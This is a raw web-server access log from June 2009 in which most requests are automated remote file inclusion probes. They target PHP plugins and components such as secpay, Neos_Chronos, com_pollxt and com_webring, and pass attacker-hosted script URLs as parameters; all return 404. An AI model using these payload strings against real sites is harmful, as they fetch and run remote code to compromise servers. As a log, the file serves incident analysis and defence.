59.125.5.1 - - [29/Jun/2009:01:19:16 -0700] "GET /logs/access.log/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://tomato.pooding.com/lib/bankofamerica/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:01:19:16 -0700] "GET /plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://tomato.pooding.com/lib/bankofamerica/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:01:19:17 -0700] "GET /logs/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://tomato.pooding.com/lib/bankofamerica/images/idd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:21:19 -0700] "GET /logs/access_090330.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:25:10 -0700] "GET /logs/access_090330.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
64.186.128.233 - - [29/Jun/2009:01:29:11 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://dany8429.altervista.org/images/fx29id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:33:07 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:33:07 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:33:07 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:33:55 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:33:55 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:33:55 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:34:18 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:34:18 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:34:18 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:34:31 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:34:32 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:34:32 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:35:22 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:35:22 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:35:22 -0700] "GET /logs/access.log%20%20/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:35:27 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:35:27 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:35:27 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:01:36:00 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:01:36:00 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:01:36:00 -0700] "GET /logs/access_090330.log/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:01:36:20 -0700] "GET /logs/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:01:36:20 -0700] "GET /plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
59.125.5.1 - - [29/Jun/2009:01:36:20 -0700] "GET /logs/access.log/plugins/payment/secpay/secpay.inc.php?config%5broot_dir%5d=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:37:18 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:37:18 -0700] "GET /logs/access_090330.log/modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.189.18.73 - - [29/Jun/2009:01:37:18 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:01:38:55 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:01:39:09 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:01:39:42 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:01:39:42 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:01:39:42 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:01:39:44 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:01:39:44 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
216.246.98.115 - - [29/Jun/2009:01:39:44 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/idalb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:01:40:42 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:01:40:42 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
65.55.106.240 - - [29/Jun/2009:01:40:43 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:01:40:45 -0700] "GET /logs/access_090105.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:41:54 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:41:54 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:41:54 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:42:02 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:42:02 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:42:02 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:01:42:15 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:01:42:15 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:01:42:15 -0700] "GET /logs/access_090105.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:01:42:25 -0700] "GET /logs/access_090105.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:01:42:25 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cecilcap.org/smf/_a?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:01:42:26 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:44:35 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:44:35 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:44:35 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:44:40 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:44:40 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:44:40 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/rfi.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:01:47:50 -0700] "GET /index2.php?ID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:01:47:55 -0700] "GET /logs/access_090105.log%20%20/index2.php?ID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:01:47:55 -0700] "GET /logs/index2.php?ID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:01:47:59 -0700] "GET /logs/access_090105.log%20%20/index2.php?ID=http://www.knt.hs.kr///id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:01:47:59 -0700] "GET /logs/index2.php?ID=http://www.knt.hs.kr///id1.txt? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
122.153.28.140 - - [29/Jun/2009:01:47:59 -0700] "GET /index2.php?ID=http://www.knt.hs.kr///id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:01:50:10 -0700] "GET /index1.php?menu=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:01:50:10 -0700] "GET /logs/access.log/index1.php?menu=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:01:50:10 -0700] "GET /logs/index1.php?menu=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:01:50:20 -0700] "GET /index1.php?menu=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:01:50:20 -0700] "GET /logs/index1.php?menu=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:01:50:20 -0700] "GET /logs/access.log/index1.php?menu=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:01:50:28 -0700] "GET /logs/access_081215.log/index1.php?menu=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:01:50:36 -0700] "GET /logs/access_081215.log/index1.php?menu=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:50:46 -0700] "GET /logs/access.log%20%20/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:50:53 -0700] "GET /logs/access.log%20%20/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:01:51:04 -0700] "GET /logs/access.log%20%20/index1.php?menu=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:01:51:08 -0700] "GET /logs/access.log%20%20/index1.php?menu=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:56:38 -0700] "GET /modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:56:38 -0700] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:01:56:38 -0700] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
216.129.119.49 - - [29/Jun/2009:01:57:17 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "collegiateforum.org"
86.39.131.85 - - [29/Jun/2009:01:57:26 -0700] "GET /logs/access.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
86.39.131.85 - - [29/Jun/2009:01:57:26 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
86.39.131.85 - - [29/Jun/2009:01:57:26 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
86.39.131.85 - - [29/Jun/2009:01:58:57 -0700] "GET /logs/access.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/images/detail/test2.jpg/src/edit/felc/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:02:02:20 -0700] "GET /logs/access_090330.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:02:49 -0700] "GET /htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:02:49 -0700] "GET /logs/access_081208.log/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:02:49 -0700] "GET /logs/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:03:08 -0700] "GET /htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:03:08 -0700] "GET /logs/access_081208.log/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:03:08 -0700] "GET /logs/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
211.203.180.144 - - [29/Jun/2009:02:05:16 -0700] "GET /logs/access_090330.log/modules/Neos_Chronos/header.php?base_folder=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:05:31 -0700] "GET /logs/access.log%20%20/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:05:36 -0700] "GET /logs/access.log%20%20/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:06:03 -0700] "GET /logs//components/com_webring/admin.webring.docs.php?component_dir=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:06:03 -0700] "GET /components/com_webring/admin.webring.docs.php?component_dir=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:06:03 -0700] "GET /logs/access.log%20%20//components/com_webring/admin.webring.docs.php?component_dir=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:06:42 -0700] "GET /logs//components/com_webring/admin.webring.docs.php?component_dir=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:06:42 -0700] "GET /logs/access.log//components/com_webring/admin.webring.docs.php?component_dir=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:06:42 -0700] "GET /components/com_webring/admin.webring.docs.php?component_dir=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:07:15 -0700] "GET /logs/access_081208.log%20%20/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:07:22 -0700] "GET /logs/access_081208.log%20%20/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:07:39 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.98.209.71 - - [29/Jun/2009:02:08:17 -0700] "GET /logs/access.log/htmltonuke.php?filnavn=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:08:35 -0700] "GET /components/com_webring/admin.webring.docs.php?component_dir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:08:35 -0700] "GET /logs//components/com_webring/admin.webring.docs.php?component_dir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
83.13.191.186 - - [29/Jun/2009:02:08:35 -0700] "GET /logs/access.log%20%20//components/com_webring/admin.webring.docs.php?component_dir=http://www.cecilcap.org/smf/_a?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.collegiateforum.org"
66.197.183.69 - - [29/Jun/2009:02:11:21 -0700] "GET /usr/sbin/httpd? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "collegiateforum.org"
